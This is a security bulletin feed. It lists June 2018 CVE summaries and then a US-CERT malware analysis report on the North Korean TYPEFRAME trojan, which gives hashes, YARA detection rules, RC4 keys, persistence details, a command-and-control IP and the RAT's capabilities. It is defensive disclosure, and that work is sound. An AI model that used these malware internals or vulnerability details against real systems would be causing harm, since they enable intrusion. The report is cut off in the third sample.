Buffer overflow can occur while processing a HTT_T2H_MSG_TYPE_TX_COMPL_IND message with an out-of-range num_msdus value in all Android releases from CAF (Android for MSM, Firefox OS for MSM, QRD Android) using the Linux Kernel. | 2018-06-12 | not yet calculated | CVE-2018-5851
MISC
qualcomm -- android
 
In the function wmi_set_ie(), the length validation code does not handle unsigned integer overflow properly. As a result, a large value of the 'ie_len' argument can cause a buffer overflow in all Android releases from CAF (Android for MSM, Firefox OS for MSM, QRD Android) using the Linux Kernel. | 2018-06-12 | not yet calculated | CVE-2018-5848
MISC
qualcomm -- android
 
The Olive Tree Ftp Server application 1.32 for Android has a "Sensitive Data on the Clipboard" vulnerability, as demonstrated by reading the "User password" field with the Drozer post.capture.clipboard module. | 2018-06-15 | not yet calculated | CVE-2018-12481
MISC
radare -- radare2
 
There is a use after free in radare2 2.6.0 in r_anal_bb_free() in libr/anal/bb.c via a crafted Java binary file. | 2018-06-13 | not yet calculated | CVE-2018-12320
MISC
MISC
radare -- radare2
 
There is a heap out of bounds read in radare2 2.6.0 in java_switch_op() in libr/anal/p/anal_java.c via a crafted Java binary file. | 2018-06-13 | not yet calculated | CVE-2018-12321
MISC
MISC
radare -- radare2
 
There is a heap out of bounds read in radare2 2.6.0 in _6502_op() in libr/anal/p/anal_6502.c via a crafted iNES ROM binary file. | 2018-06-13 | not yet calculated | CVE-2018-12322
MISC
MISC
redis -- redis
 
Type confusion in the xgroupCommand function in t_stream.c in redis-server in Redis before 5.0 allows remote attackers to cause denial-of-service via an XGROUP command in which the key is not a stream. | 2018-06-16 | not yet calculated | CVE-2018-12453
MISC
MISC
s3ql -- s3ql
 
S3QL before 2.27 mishandles checksumming, and consequently allows replay attacks in which an attacker who controls the backend can present old versions of the filesystem metadata database as up-to-date, temporarily inject zero-valued bytes into files, or temporarily hide parts of files. This is related to the checksum_basic_mapping function. | 2018-06-10 | not yet calculated | CVE-2018-12088
CONFIRM
CONFIRM
CONFIRM
safensec -- softcontrol/safensoft
 
Improper restriction of write operations within the bounds of a memory buffer in snscore.sys in SoftControl/SafenSoft SysWatch, SoftControl/SafenSoft TPSecure, SoftControl/SafenSoft Enterprise Suite before version 4.4.1 allows local users to cause a denial of service (BSOD) or modify kernel-mode memory via loading of a forged DLL into a user-mode process. | 2018-06-12 | not yet calculated | CVE-2018-5718
CONFIRM
samsung -- web_viewer_for_samsung_dvr
 
Smart Viewer in Samsung Web Viewer for Samsung DVR is vulnerable to cross-site scripting, caused by improper validation of user-supplied input. A remote attacker could exploit this vulnerability via a crafted URL to execute script in a victim's Web browser within the security context of the hosting Web site, once the URL is clicked. An attacker could use this vulnerability to steal the victim's cookie-based authentication credentials. | 2018-06-14 | not yet calculated | CVE-2018-11689
BUGTRAQ
sap -- hana_backup_service
 
Under certain conditions, SAP Business One, 9.2, 9.3, for SAP HANA backup service allows an attacker to access information which would otherwise be restricted. | 2018-06-12 | not yet calculated | CVE-2018-2425
BID
MISC
CONFIRM
sap -- multiple_products
 
Under certain conditions SAP UI5 Handler allows an attacker to access information which would otherwise be restricted. Software components affected are: SAP Infrastructure 1.0, SAP UI 7.4, 7.5, 7.51, 7.52 and version 2.0 of SAP UI for SAP NetWeaver 7.00. | 2018-06-12 | not yet calculated | CVE-2018-2428
BID
MISC
CONFIRM
sap -- multiple_products
 
SAP UI5 did not validate user input before adding it to the DOM structure. This may lead to malicious user-provided JavaScript code being added to the DOM that could steal user information. Software components affected are: SAP Hana Database 1.00, 2.00; SAP UI5 1.00; SAP UI5 (Java) 7.30, 7.31, 7.40, 7,50; SAP UI 7.40, 7.50, 7.51, 7.52, and version 2.0 of SAP UI for SAP NetWeaver 7.00. | 2018-06-12 | not yet calculated | CVE-2018-2424
BID
MISC
CONFIRM
seacms -- seacms
 
SeaCMS V6.61 has XSS via the site name parameter on an adm1n/admin_config.php page (aka a system management page). | 2018-06-14 | not yet calculated | CVE-2018-12431
MISC
siemens -- scalance_switches
 
A vulnerability has been identified in SCALANCE X-200 IRT (All versions < V5.4.1), SCALANCE X300 (All versions). A remote, authenticated attacker with access to the configuration web server could be able to store script code on the web site, if the HRP redundancy option is set. This code could be executed in the web browser of victims visiting this web site (XSS), affecting its confidentiality, integrity and availability. User interaction is required for successful exploitation, as the user needs to visit the manipulated web site. | 2018-06-14 | not yet calculated | CVE-2018-4842
CONFIRM
siemens -- scalance_switches
 
A vulnerability has been identified in SCALANCE X-200 IRT (All versions < V5.4.1), SCALANCE X300 (All versions). The integrated configuration web server of the affected Scalance X Switches could allow Cross-Site Scripting (XSS) attacks if unsuspecting users are tricked into accessing a malicious link. User interaction is required for a successful exploitation. The user must be logged into the web interface in order for the exploitation to succeed. | 2018-06-14 | not yet calculated | CVE-2018-4848
CONFIRM
siemens -- scalance_switches
 
A vulnerability has been identified in RFID 181-EIP (All versions), RUGGEDCOM WiMAX (V4.4 and V4.5), SCALANCE X-200 (All versions < V5.2.3), SCALANCE X-200 IRT (All versions < V5.4.1), SCALANCE X-204RNA (All versions), SCALANCE X-300 (All versions), SCALANCE X408 (All versions), SCALANCE X414 (All versions), SIMATIC RF182C (All versions). Unprivileged remote attackers located in the same local network segment (OSI Layer 2) could gain remote code execution on the affected products by sending a specially crafted DHCP response to a client's DHCP request. | 2018-06-14 | not yet calculated | CVE-2018-4833
CONFIRM
simple_password_store -- simple_password_store
 
An issue was discovered in password-store.sh in pass in Simple Password Store 1.7.x before 1.7.2. The signature verification routine parses the output of GnuPG with an incomplete regular expression, which allows remote attackers to spoof file signatures on configuration files and extension scripts. Modifying the configuration file allows the attacker to inject additional encryption keys under their control, thereby disclosing passwords to the attacker. Modifying the extension scripts allows the attacker arbitrary code execution. | 2018-06-14 | not yet calculated | CVE-2018-12356
MISC
MISC
MISC
sonatype -- nexus_repository_manager
 
Sonatype Nexus Repository Manager before 3.12.0 has XSS in multiple areas in the Administration UI. | 2018-06-11 | not yet calculated | CVE-2018-12100
CONFIRM
CONFIRM
CONFIRM
splunk -- splunk
 
Splunk through 7.0.1 allows information disclosure by appending __raw/services/server/info/server-info?output_mode=json to a query, as demonstrated by discovering a license key. | 2018-06-08 | not yet calculated | CVE-2018-11409
MISC
EXPLOIT-DB
suse -- linux_enterprise
 
Missing escaping of ESSID values in sysconfig of SUSE Linux Enterprise allows attackers controlling an access point to execute arbitrary code. Affected releases are sysconfig prior to 0.83.7-2.1. | 2018-06-12 | not yet calculated | CVE-2011-4182
CONFIRM
CONFIRM
suse -- open-build-service

A vulnerability in open build service allows remote attackers to gain access to source files even though source access is disabled. Affected releases are SUSE open build service up to and including version 2.1.15 (for 2.1) and before version 2.3. | 2018-06-11 | not yet calculated | CVE-2011-4181
CONFIRM
CONFIRM
suse -- open-build-service
 
A vulnerability in open build service allows remote attackers to upload arbitrary RPM files. Affected releases are SUSE open build service prior to 2.1.16. | 2018-06-13 | not yet calculated | CVE-2011-4183
CONFIRM
CONFIRM
symfony -- symfony
 
The security handlers in the Security component in Symfony in 2.7.x before 2.7.48, 2.8.x before 2.8.41, 3.3.x before 3.3.17, 3.4.x before 3.4.11, and 4.0.x before 4.0.11 have an Open redirect vulnerability when security.http_utils is inlined by a container. NOTE: this issue exists because of an incomplete fix for CVE-2017-16652. | 2018-06-13 | not yet calculated | CVE-2018-11408
FEDORA
FEDORA
FEDORA
CONFIRM
symfony -- symfony
 
An issue was discovered in the Ldap component in Symfony 2.8.x before 2.8.37, 3.3.x before 3.3.17, 3.4.x before 3.4.7, and 4.0.x before 4.0.7. It allows remote attackers to bypass authentication by logging in with a "null" password and valid username, which triggers an unauthenticated bind. NOTE: this issue exists because of an incomplete fix for CVE-2016-2403. | 2018-06-13 | not yet calculated | CVE-2018-11407
CONFIRM
symfony -- symfony
 
An issue was discovered in the Security component in Symfony 2.7.x before 2.7.48, 2.8.x before 2.8.41, 3.3.x before 3.3.17, 3.4.x before 3.4.11, and 4.0.x before 4.0.11. A session fixation vulnerability within the "Guard" login feature may allow an attacker to impersonate a victim towards the web application if the session id value was previously known to the attacker. | 2018-06-13 | not yet calculated | CVE-2018-11385
FEDORA
FEDORA
FEDORA
CONFIRM
symfony -- symfony
 
An issue was discovered in the HttpFoundation component in Symfony 2.7.x before 2.7.48, 2.8.x before 2.8.41, 3.3.x before 3.3.17, 3.4.x before 3.4.11, and 4.0.x before 4.0.11. The PDOSessionHandler class allows storing sessions on a PDO connection. Under some configurations and with a well-crafted payload, it was possible to do a denial of service on a Symfony application without many resources. | 2018-06-13 | not yet calculated | CVE-2018-11386
FEDORA
FEDORA
FEDORA
CONFIRM
symfony -- symfony
 
An issue was discovered in Symfony 2.7.x before 2.7.38, 2.8.x before 2.8.31, 3.2.x before 3.2.14, and 3.3.x before 3.3.13. DefaultAuthenticationSuccessHandler or DefaultAuthenticationFailureHandler takes the content of the _target_path parameter and generates a redirect response, but no check is performed on the path, which could be an absolute URL to an external domain. This Open redirect vulnerability can be exploited, for example, to mount effective phishing attacks. | 2018-06-13 | not yet calculated | CVE-2017-16652
CONFIRM
symfony -- symfony
 
An issue was discovered in the Security component in Symfony 2.7.x before 2.7.48, 2.8.x before 2.8.41, 3.3.x before 3.3.17, 3.4.x before 3.4.11, and 4.0.x before 4.0.11. By default, a user's session is invalidated when the user is logged out. This behavior can be disabled through the invalidate_session option. In this case, CSRF tokens were not erased during logout which allowed for CSRF token fixation. | 2018-06-13 | not yet calculated | CVE-2018-11406
FEDORA
FEDORA
FEDORA
CONFIRM
synology -- calendar
 
Improper authorization vulnerability in SYNO.Cal.Event in Calendar before 2.1.2-0511 allows remote authenticated users to create arbitrary events via the (1) cal_id or (2) original_cal_id parameter. | 2018-06-14 | not yet calculated | CVE-2018-8927
CONFIRM
tenable -- western_digital_tv_media_player_and_tv_live_hub
 
The web server on Western Digital TV Media Player 1.03.07 and TV Live Hub 3.12.13 allow unauthenticated remote attackers to execute arbitrary code or cause denial of service via crafted HTTP requests to toServerValue.cgi. | 2018-06-12 | not yet calculated | CVE-2018-1151
MISC
tibco_software -- tibco_administrator
 
The TIBCO Administrator server component of TIBCO Software Inc.'s TIBCO Administrator - Enterprise Edition, and TIBCO Administrator - Enterprise Edition for z/Linux contains multiple vulnerabilities wherein a malicious user could theoretically perform cross-site scripting (XSS) attacks by way of manipulating artifacts prior to uploading them. Affected releases are TIBCO Software Inc.'s TIBCO Administrator - Enterprise Edition: versions up to and including 5.10.0, and TIBCO Administrator - Enterprise Edition for z/Linux: versions up to and including 5.9.1. | 2018-06-13 | not yet calculated | CVE-2018-5432
BID
CONFIRM
tibco_software -- tibco_administrator
 
The TIBCO Administrator server component of TIBCO Software Inc.'s TIBCO Administrator - Enterprise Edition, and TIBCO Administrator - Enterprise Edition for z/Linux contains vulnerabilities wherein a malicious user could perform XML external entity expansion (XXE) attacks to disclose host machine information. Affected releases are TIBCO Software Inc.'s TIBCO Administrator - Enterprise Edition: versions up to and including 5.10.0, and TIBCO Administrator - Enterprise Edition for z/Linux: versions up to and including 5.9.1. | 2018-06-13 | not yet calculated | CVE-2018-5433
BID
CONFIRM
tibco_software -- tibco_runtime_agent
 
The TIBCO Designer component of TIBCO Software Inc.'s TIBCO Runtime Agent, and TIBCO Runtime Agent for z/Linux contains vulnerabilities wherein a malicious user could perform XML external entity expansion (XXE) attacks to disclose host machine information. Affected releases are TIBCO Software Inc.'s TIBCO Runtime Agent: versions up to and including 5.10.0, and TIBCO Runtime Agent for z/Linux: versions up to and including 5.9.1. | 2018-06-13 | not yet calculated | CVE-2018-5434
BID
CONFIRM
tinyexr -- tinyexr
 
tinyexr 0.9.5 has a heap-based buffer over-read in tinyexr::DecodePixelData in tinyexr.h, related to OpenEXR code. | 2018-06-11 | not yet calculated | CVE-2018-12092
MISC
tinyexr -- tinyexr
 
tinyexr 0.9.5 has a heap-based buffer over-read in LoadEXRImageFromMemory in tinyexr.h. | 2018-06-16 | not yet calculated | CVE-2018-12503
MISC
MISC
tinyexr -- tinyexr
 
tinyexr 0.9.5 has a memory leak in ParseEXRHeaderFromMemory in tinyexr.h. | 2018-06-11 | not yet calculated | CVE-2018-12093
MISC
tinyexr -- tinyexr
 
tinyexr 0.9.5 has an assertion failure in ComputeChannelLayout in tinyexr.h. | 2018-06-16 | not yet calculated | CVE-2018-12504
MISC
MISC
trend_micro -- officescan

A vulnerability in Trend Micro OfficeScan 11.0 SP1 and XG could allow an attacker to use a specially crafted URL to elevate account permissions on vulnerable installations. An attacker must already have at least guest privileges in order to exploit this vulnerability. | 2018-06-12 | not yet calculated | CVE-2018-10508
CONFIRM
trend_micro -- officescan
 
A vulnerability in Trend Micro OfficeScan 11.0 SP1 and XG could allow an attacker to exploit it via a Browser Refresh attack on vulnerable installations. An attacker must be using an AD logon user account in order to exploit this vulnerability. | 2018-06-12 | not yet calculated | CVE-2018-10509
CONFIRM
trend_micro -- officescan
 
A vulnerability in Trend Micro OfficeScan 11.0 SP1 and XG could allow an attacker to take a series of steps to bypass or render the OfficeScan Unauthorized Change Prevention inoperable on vulnerable installations. An attacker must already have administrator privileges in order to exploit this vulnerability. | 2018-06-12 | not yet calculated | CVE-2018-10507
MISC
CONFIRM
EXPLOIT-DB
ucmbd -- ucmbd_browser
 
Remote Cross-site Request forgery (CSRF) potential has been identified in UCMBD Browser version 4.10, 4.11, 4.12, 4.13, 4.14, 4.15, 4.15.1 which could allow for remote unsafe deserialization and cross-site request forgery (CSRF). | 2018-06-15 | not yet calculated | CVE-2018-6496
CONFIRM
ucmbd -- ucmbd_server
 
Remote Cross-site Request forgery (CSRF) potential has been identified in UCMBD Server version DDM Content Pack V 10.20, 10.21, 10.22, 10.22 CUP7, 10.30, 10.31, 10.32, 10.33, 10.33 CUP2, 11.0 and CMS Server version 2018.05 BACKGROUND which could allow for remote unsafe deserialization and cross-site request forgery (CSRF). | 2018-06-15 | not yet calculated | CVE-2018-6497
CONFIRM
virus_total -- yara
 
In YARA 3.7.1 and prior, parsing a specially crafted compiled rule file can cause an out of bounds write vulnerability in yr_execute_code in libyara/exec.c. | 2018-06-15 | not yet calculated | CVE-2018-12035
MISC
MISC
CONFIRM
virus_total -- yara
 
In YARA 3.7.1 and prior, parsing a specially crafted compiled rule file can cause an out of bounds read vulnerability in yr_execute_code in libyara/exec.c. | 2018-06-15 | not yet calculated | CVE-2018-12034
MISC
MISC
CONFIRM
vmware -- nsx_sd-wan_edge
 
VMware NSX SD-WAN Edge by VeloCloud prior to version 3.1.0 contains a command injection vulnerability in the local web UI component. This component is disabled by default and should not be enabled on untrusted networks. VeloCloud by VMware will be removing this service from the product in future releases. Successful exploitation of this issue could result in remote code execution. | 2018-06-11 | not yet calculated | CVE-2018-6961
BID
CONFIRM
wolfssl -- wolfssl
 
wolfcrypt/src/ecc.c in wolfSSL before 3.15.1.patch allows a memory-cache side-channel attack on ECDSA signatures, aka the Return Of the Hidden Number Problem or ROHNP. To discover an ECDSA key, the attacker needs access to either the local machine or a different virtual machine on the same physical host. | 2018-06-14 | not yet calculated | CVE-2018-12436
MISC
MISC
MISC
wordpress -- wordpress
 
An issue was discovered in the WpDevArt "Booking calendar, Appointment Booking System" plugin 2.2.2 for WordPress. Multiple parameters allow remote attackers to manipulate the values to change data such as prices. | 2018-06-13 | not yet calculated | CVE-2018-10363
MISC
ximdex -- ximdex
 
The /edit URI in the DMS component in Ximdex 4.0 has XSS via the Ciudad or Nombre parameter. | 2018-06-13 | not yet calculated | CVE-2018-12273
MISC
ximdex -- ximdex
 
xowl/request.php in Ximdex 4.0 has XSS via the content parameter. | 2018-06-13 | not yet calculated | CVE-2018-12272
MISC
xiongmai -- uc-httpd
 
Buffer overflow in XiongMai uc-httpd 1.0.0 has unspecified impact and attack vectors, a different vulnerability than CVE-2017-16725. | 2018-06-08 | not yet calculated | CVE-2018-10088
MISC
EXPLOIT-DB
yii2 -- yii2
 
The Yii2-StateMachine extension v2.x.x for Yii2 has XSS. | 2018-06-13 | not yet calculated | CVE-2018-12290
MISC


 Thu, 14 Jun 2018 16:04:10 +0000 North Korean Malicious Cyber Activity
Original release date: June 14, 2018

The Department of Homeland Security (DHS) and the Federal Bureau of Investigation (FBI) have identified Trojan malware variants—referred to as TYPEFRAME—used by the North Korean government. The U.S. Government refers to malicious cyber activity by the North Korean government as HIDDEN COBRA.

US-CERT encourages users and administrators to review Malware Analysis Report (MAR) 10135536-12 and the US-CERT page on HIDDEN COBRA - North Korean Malicious Cyber Activity for more information.




 Thu, 14 Jun 2018 14:16:49 +0000 AR18-165A: MAR-10135536-12 – North Korean Trojan: TYPEFRAME
Original release date: June 14, 2018

Description

Notification

This report is provided "as is" for informational purposes only. The Department of Homeland Security (DHS) does not provide any warranties of any kind regarding any information contained within. The DHS does not endorse any commercial product or service, referenced in this bulletin or otherwise.

This document is marked TLP:WHITE. Disclosure is not limited. Sources may use TLP:WHITE when information carries minimal or no foreseeable risk of misuse, in accordance with applicable rules and procedures for public release. Subject to standard copyright rules, TLP:WHITE information may be distributed without restriction. For more information on the Traffic Light Protocol, see http://www.us-cert.gov/tlp.

Summary

Description

This Malware Analysis Report (MAR) is the result of analytic efforts between the Department of Homeland Security (DHS) and the Federal Bureau of Investigation (FBI). Working with U.S. Government partners, DHS and FBI identified Trojan malware variants used by the North Korean government. This malware variant is known as TYPEFRAME. The U.S. Government refers to malicious cyber activity by the North Korean government as HIDDEN COBRA. For more information on HIDDEN COBRA activity, visit https://www.us-cert.gov/hiddencobra.

DHS and FBI are distributing this MAR to enable network defense and reduce exposure to North Korean government malicious cyber activity.

This MAR includes malware descriptions related to HIDDEN COBRA, suggested response actions and recommended mitigation techniques. Users and administrators should flag activity associated with the malware, report the activity to the DHS National Cybersecurity and Communications Integration Center (NCCIC) or the FBI Cyber Watch (CyWatch), and give the activity the highest priority for enhanced mitigation.

This malware report contains analysis of 11 malware samples consisting of 32-bit and 64-bit Windows executable files and a malicious Microsoft Word document that contains Visual Basic for Applications (VBA) macros. These files have the capability to download and install malware, install proxy and Remote Access Trojans (RATs), connect to command and control (C2) servers to receive additional instructions, and modify the victim's firewall to allow incoming connections.

For a downloadable copy of IOCs, see:

Submitted Files (11)


Additional Files (3)

089e49de61701004a5eff6de65476ed9c7632b6020c2c0f38bb5761bca897359 (midimapper.rs)

a71017302e1745c8a3d6e425187eb23c7531551bb6f547e47198563a78e933b6 (laxhost.dll)

e088c3a0b0f466df5329d9a66ff618de3d468d8a5981715303babb1452631eef (dwnhost.dll)

IPs (7)


Findings

8c3e0204f52200325ed36db9b12aba1c5e46984d415514538a5bf10783cacdf8

Tags

remote-access-trojan, trojan

Details
Name: F5A4235EF02F34D547F71AA5434D9BB4
Size: 490705 bytes
Type: PE32 executable (GUI) Intel 80386, for MS Windows
MD5: f5a4235ef02f34d547f71aa5434d9bb4
SHA1: 338699d56f17ab91fa2da1cb446593c013ae1a01
SHA256: 8c3e0204f52200325ed36db9b12aba1c5e46984d415514538a5bf10783cacdf8
SHA512: 27c610096248492fce0f8f478c62255cd1abc4ceb4a1ae310ca311a6d38ee3b93ce75ba45089204d0eb2036393bdcb98b3e77396d5ae6b9eecacc3a019ed225e
ssdeep: 12288:2okf/Epk6/lctEJxrXtl3h1ihDnjvAHR7ie5XtO/DRUKwS4Z/B5:2o6/EpH/iwNXtlhSnjg+e5A/DaZp5
Entropy: 7.788643
Antivirus
Avira: TR/Crypt.ZPACK.Gen
Symantec: Heur.AdvML.C
Yara Rules
hidden_cobra_consolidated.yara
rule enc_PK_header
{
    meta:
        author = "NCCIC trusted 3rd party"
        incident = "10135536"
        date = "2018-04-12"
        category = "hidden_cobra"
        family = "TYPEFRAME"
        hash0 = "3229a6cea658b1b3ca5ca9ad7b40d8d4"
    strings:
        $s0 = { 5f a8 80 c5 a0 87 c7 f0 9e e6 }
        $s1 = { 95 f1 6e 9c 3f c1 2c 88 a0 5a }
        $s2 = { ae 1d af 74 c0 f5 e1 02 50 10 }
    condition:
        (uint16(0) == 0x5A4D and uint16(uint32(0x3c)) == 0x4550) and any of them
}
hidden_cobra_consolidated.yara
rule import_obfuscation_2
{
    meta:
        author = "NCCIC trusted 3rd party"
        incident = "10135536"
        date = "2018-04-12"
        category = "hidden_cobra"
        family = "TYPEFRAME"
        hash0 = "bfb41bc0c3856aa0a81a5256b7b8da51"
    strings:
        $s0 = {A6 D6 02 EB 4E B2 41 EB C3 EF 1F}
        $s1 = {B6 DF 01 FD 48 B5 }
        $s2 = {B6 D5 0E F3 4E B5 }
        $s3 = {B7 DF 0E EE }
        $s4 = {B6 DF 03 FC }
        $s5 = {A7 D3 03 FC }
    condition:
        (uint16(0) == 0x5A4D and uint16(uint32(0x3c)) == 0x4550) and all of them
}
ssdeep Matches

No matches found.

PE Metadata
Compile Date2017-06-05 21:21:28-04:00
Import Hashedb148321293bdc8b7ba8fbe0b1c6ed9
PE Sections
MD5NameRaw SizeEntropy
dde6c6e739f41680377511c709f7209aheader40960.590336
db44e1900789a7fd43b05d3871c9ab03.text532486.538652
91d9797bd52d49fb73009fc3e0cdd7c5.rdata122883.476192
ef4ab26cc2c30397b12c53c759fcbef2.data163842.132158
Packers/Compilers/Cryptors
Microsoft Visual C++ v6.0
Relationships
8c3e0204f5...Containsa71017302e1745c8a3d6e425187eb23c7531551bb6f547e47198563a78e933b6
Description

This file is a 32-bit Windows portable executable file designed to install a Remote Access Trojan (RAT) as a service on the victim system. The malware accepts the following argument during execution: "68S3mI2AMcmOz3BgjnuYpLlZ4fZog7sd".

The RAT’s APIs and strings (registry key, file names, and service name) are RC4 encrypted using the following key:

--Begin RC4 key--
85 C0 7C 17 8B 4D F4 8B 76 20 33 C0 3B C8 77 0B
--End RC4 key--


Decrypted strings of interest are displayed below:

--Begin strings of interest--
host.dll
"Task Notification Service"
"Monitors And Notifies Task Scheduling And Interaction"
netsvcs
--End strings of interest--


When executed, the RAT checks if the module "C:\Windows\system32\laxhost.dll" is installed on the compromised system. If it is not installed, it will load an embedded RC4-encrypted archive file starting at offset "0x15000".

The malware decrypts the archive using the same RC4 key. The decrypted archive contains a malicious DLL module, which is decompressed and installed into "C:\Windows\system32\laxhost.dll". The first three characters of the module name are randomly generated.

The malware contains RC4-encrypted configuration file data (192 bytes). During runtime, it installs the encrypted configuration data into the following registry key:

--Begin registry key--
hKey = HKEY_LOCAL_MACHINE
Subkey = "SOFTWARE\Microsoft\Windows\CurrentVersion\ShellCompatibility\Applications\laxhost.dll"
ValueName = "Description"
ValueData = "RC4 encrypted configuration file data"
--End registry key--


The malware installs a malicious DLL module as a serviceDLL in the "netsvcs" service group in order to execute "C:\Windows\system32\laxhost.dll" using the Windows service hosting process, "%SYSTEMROOT%\system32\svchost.exe". The service name and the display name are randomly generated.

The installed service information is displayed below:

--Begin service information--
ServiceName = "Irmon"
DisplayName = "Irmon"
DesiredAccess = SERVICE_ALL_ACCESS
ServiceType = SERVICE_WIN32_SHARE_PROCESS
StartType = SERVICE_AUTO_START
BinaryPathName = "%SYSTEMROOT%\system32\svchost.exe -k netsvcs"
--End service information--

a71017302e1745c8a3d6e425187eb23c7531551bb6f547e47198563a78e933b6

Tags

backdoor, remote-access-trojan, trojan

Details
Name: laxhost.dll
Size: 843776 bytes
Type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
MD5: aa7924157b77dd1ff749d474f3062f90
SHA1: 4f02a6bf2b24c371e9f589cff8e32b4d94cf4f29
SHA256: a71017302e1745c8a3d6e425187eb23c7531551bb6f547e47198563a78e933b6
SHA512: 5150d8b063297d0da04288b4e4e2ad3d54b7546d909a71557789529d73703673098c37970280cd62c45306458cfcda701c1a7cee31ee7fb2192e627e11f0a3bd
ssdeep: 24576:r/pmC31xkE8sOvtQ6Wtuc0WhgpaM2yYq:bpj0E8sOvtQ6Wtuc0WhgpaM2yYq
Entropy: 6.681288
Antivirus
Microsoft Security Essentials: Backdoor:Win32/SilverMob.A!dha
Yara Rules
hidden_cobra_consolidated.yara
rule import_obfuscation_2
{
    meta:
        author = "NCCIC trusted 3rd party"
        incident = "10135536"
        date = "2018-04-12"
        category = "hidden_cobra"
        family = "TYPEFRAME"
        hash0 = "bfb41bc0c3856aa0a81a5256b7b8da51"
    strings:
        $s0 = { A6 D6 02 EB 4E B2 41 EB C3 EF 1F }
        $s1 = { B6 DF 01 FD 48 B5 }
        $s2 = { B6 D5 0E F3 4E B5 }
        $s3 = { B7 DF 0E EE }
        $s4 = { B6 DF 03 FC }
        $s5 = { A7 D3 03 FC }
    condition:
        (uint16(0) == 0x5A4D and uint16(uint32(0x3c)) == 0x4550) and all of them
}
ssdeep Matches

No matches found.

PE Metadata
Compile Date: 2017-06-09 13:59:30-04:00
Import Hash: 180f8d53e7b967e9af9444547c05f192
Company Name: Microsoft Corporation
File Description: Xps Object Model in memory creation and deserialization
Internal Name: xpsservices.dll
Legal Copyright: Microsoft Corporation. All rights reserved.
Original Filename: xpsservices.dll
Product Name: Microsoft Windows Operating System
Product Version: 6.1.7601.17514
PE Sections
MD5                               Name    Raw Size  Entropy
e1b6f98aadc18cf1b2e1796eb3d8b783  header  4096      0.800174
5d97a9d06913043a085d8071f7a5ab7c  .text   540672    6.661444
bab7eb304870fe36e8c98f5085b8603c  .rdata  163840    6.184319
33e00b6b91f87e1e948a8bc44803837f  .data   81920     4.853104
4093ef4294e5d39c92ba4d89a6c92a15  .rsrc   8192      3.983157
39ddff289842b4fafc796c9795b870c8  .reloc  45056     5.723684
Packers/Compilers/Cryptors
Microsoft Visual C++ 6.0
Microsoft Visual C++ 6.0 DLL (Debug)
Relationships
a71017302e... Connected_To 59.90.93.97
a71017302e... Contained_Within 8c3e0204f52200325ed36db9b12aba1c5e46984d415514538a5bf10783cacdf8
Description

laxhost.dll (original name: KDCOLCWP.DLL) is a 32-bit Windows dynamic-link library (DLL) file and is a RAT module that was installed as a service by the file 8c3e0204f52200325ed36db9b12aba1c5e46984d415514538a5bf10783cacdf8.

laxhost.dll’s APIs and strings (registry key, file names, and service name) are RC4 encrypted using the following key:

--Begin RC4 key--
85 C0 7C 17 8B 4D F4 8B 76 20 33 C0 3B C8 77 0B
--End RC4 key--

When executed, it loads and decrypts the encrypted configuration file data from the registry using the same RC4 key:

--Begin registry key--
hKey = HKEY_LOCAL_MACHINE
Subkey = "SOFTWARE\Microsoft\Windows\CurrentVersion\ShellCompatibility\Applications\laxhost.dll"
ValueName = "Description"
ValueData = "RC4 encrypted configuration file data"
--End registry key--

The decrypted data contains a hexadecimal-encoded C2 IP address and port number:

--Begin IP and port # list--
BB 01 3B 5A 5D 61 ==> 59.90.93.97:443
--End IP and port # list--

The malware attempts to connect to its C2 server 59.90.93.97 using port 443 and waits for further instructions.

The malware is designed to accept instructions from the remote server to perform the following functions:

--Begin functions performed by the malware--
Get Disk Free Space
Search for files
Execute process in elevated mode
Terminate processes
Delete files
Execute command using shell
Download and upload files
Read files and write files
Delete Service and uninstall malware components using a batch script
--End functions performed by the malware--

675a35e04b19aab314bcbc4b1f2610e3dea4a80c277cc5188f1d1391a00dfdb1

Tags

proxy, trojan

Details
Name: 10B28DA8EEFAC62CE282154F273B3E34
Size: 466267 bytes
Type: PE32 executable (GUI) Intel 80386, for MS Windows
MD5: 10b28da8eefac62ce282154f273b3e34
SHA1: 25991d00eb1b1204b0066d5aeb79ac691047d7f0
SHA256: 675a35e04b19aab314bcbc4b1f2610e3dea4a80c277cc5188f1d1391a00dfdb1
SHA512: 7955c46e3d5ed3454340821caecd44d6bc1b918ef7bdcd6f0f8d67676cbf0fde52a578583a0388c4d838652d3d1da4615ced6ae2c59b562f030f752cbc7bfb99
ssdeep: 6144:qoXLxi/EpH/ae6jEazjsHZ3OJJMUc6ngmOsH95rjw26XwXFLP7E1tC1KRtyn5o1n:qoQ/EpH/mEaiZiJy6ngm95t6qLPJp2d
Entropy: 7.761748
Antivirus
ESET: a variant of Win32/Agent.YDV trojan
Microsoft Security Essentials: Trojan:Win32/Autophyte.B!dha
Symantec: Heur.AdvML.C
Yara Rules
hidden_cobra_consolidated.yara
rule enc_PK_header
{
    meta:
        author = "NCCIC trusted 3rd party"
        incident = "10135536"
        date = "2018-04-12"
        category = "hidden_cobra"
        family = "TYPEFRAME"
        hash0 = "3229a6cea658b1b3ca5ca9ad7b40d8d4"
    strings:
        $s0 = { 5f a8 80 c5 a0 87 c7 f0 9e e6 }
        $s1 = { 95 f1 6e 9c 3f c1 2c 88 a0 5a }
        $s2 = { ae 1d af 74 c0 f5 e1 02 50 10 }
    condition:
        (uint16(0) == 0x5A4D and uint16(uint32(0x3c)) == 0x4550) and any of them
}
hidden_cobra_consolidated.yara
rule import_obfuscation_2
{
    meta:
        author = "NCCIC trusted 3rd party"
        incident = "10135536"
        date = "2018-04-12"
        category = "hidden_cobra"
        family = "TYPEFRAME"
        hash0 = "bfb41bc0c3856aa0a81a5256b7b8da51"
    strings:
        $s0 = { A6 D6 02 EB 4E B2 41 EB C3 EF 1F }
        $s1 = { B6 DF 01 FD 48 B5 }
        $s2 = { B6 D5 0E F3 4E B5 }
        $s3 = { B7 DF 0E EE }
        $s4 = { B6 DF 03 FC }
        $s5 = { A7 D3 03 FC }
    condition:
        (uint16(0) == 0x5A4D and uint16(uint32(0x3c)) == 0x4550) and all of them
}
ssdeep Matches

No matches found.

PE Metadata
Compile Date: 2016-07-24 19:38:33-04:00
Import Hash: 225e9f7be86d6676c98a852492458049
PE Sections
MD5                               Name    Raw Size  Entropy
58c7eb8637b7fbde7bb31985b77ca1af  header  4096      0.591843
65d9f034d6153048c3e51bf5e07d6486  .text   53248     6.446416
eb9c5e8a429ac587cd35f0dcec939295  .rdata  12288     3.434883
d80b556aaa361958d9ecd816ac2a36c7  .data   16384     2.106829
Packers/Compilers/Cryptors
Microsoft Visual C++ v6.0
Relationships
